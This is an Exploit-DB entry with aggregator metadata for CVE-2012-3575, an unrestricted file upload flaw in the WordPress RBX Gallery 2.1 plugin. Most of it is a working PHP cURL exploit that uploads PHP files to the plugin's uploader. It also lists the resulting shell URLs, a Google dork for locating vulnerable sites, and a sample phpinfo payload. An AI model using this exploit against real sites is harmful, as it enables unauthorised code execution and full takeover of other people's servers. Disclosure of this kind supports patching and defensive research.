ID EDB-ID:19019
Type exploitdb
Reporter Sammy FORGIT
Modified 2012-06-08T00:00:00
Description
Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload. CVE-2012-3575. Webapps exploit for php platform
##################################################
# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File
Upload Vulnerability
# Version : 2.1
# Link : http://wordpress.org/extend/plugins/rbxgallery/
# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/rbxgallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$uploadfile="lo.php";
$uploadfile2="db.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('images[0]'=>"@$uploadfile",
'images[1]'=>"@$uploadfile2",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php
lo.php
<?php
phpinfo();
?>
{"bulletinFamily": "exploit", "id": "EDB-ID:19019", "cvelist": ["CVE-2012-3575"], "modified": "2012-06-08T00:00:00", "lastseen": "2016-02-02T10:53:58", "edition": 1, "sourceData": "##################################################\r\n# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File \r\nUpload Vulnerability\r\n# Version : 2.1\r\n# Link : http://wordpress.org/extend/plugins/rbxgallery/\r\n# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip\r\n# Date : 03-06-2012\r\n# Google Dork : inurl:/wp-content/plugins/rbxgallery/\r\n# Author : Sammy FORGIT - sam at opensyscom dot fr - \r\nhttp://www.opensyscom.fr\r\n##################################################\r\n\r\n\r\nExploit :\r\n\r\nPostShell.php\r\n<?php\r\n\r\n$uploadfile=\"lo.php\";\r\n$uploadfile2=\"db.php\";\r\n$ch = \r\ncurl_init(\"http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php\");\r\ncurl_setopt($ch, CURLOPT_POST, true);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS,\r\n array('images[0]'=>\"@$uploadfile\",\r\n 'images[1]'=>\"@$uploadfile2\",\r\n 'Submit'=>'submit'));\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n$postResult = curl_exec($ch);\r\ncurl_close($ch);\r\nprint \"$postResult\";\r\n\r\n?>\r\n\r\nShell Access :\r\nhttp://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php\r\nhttp://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php\r\n\r\nlo.php\r\n<?php\r\nphpinfo();\r\n?>\r\n", "published": "2012-06-08T00:00:00", "href": "https://www.exploit-db.com/exploits/19019/", "osvdbidlist": ["82796"], "reporter": "Sammy FORGIT", "hash": "6b345b9f265578b48cec48f6ecc6fb580dbc84be80fe7205b5c874fb30688252", "title": "WordPress RBX Gallery Plugin 2.1 - Arbitrary File Upload", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload. CVE-2012-3575. Webapps exploit for php platform", "references": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19019/", "enchantments": {"vulnersScore": 6.8}}
{"result": {"cve": [{"id": "CVE-2012-3575", "type": "cve", "title": "CVE-2012-3575", "description": "Unrestricted file upload vulnerability in uploader.php in the RBX Gallery plugin 2.1 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in uploads/rbxslider.", "published": "2012-06-15T20:55:07", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3575", "cvelist": ["CVE-2012-3575"], "lastseen": "2017-08-29T12:17:43"}], "dsquare": [{"id": "E-261", "type": "dsquare", "title": "WordPress RBX Gallery 2.1 File Upload", "description": "File upload vulnerability in WordPress RBX Gallery plugin\n\nVulnerability Type: File Upload", "published": "2012-06-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2012-3575"], "lastseen": "2017-09-26T15:33:26"}]}}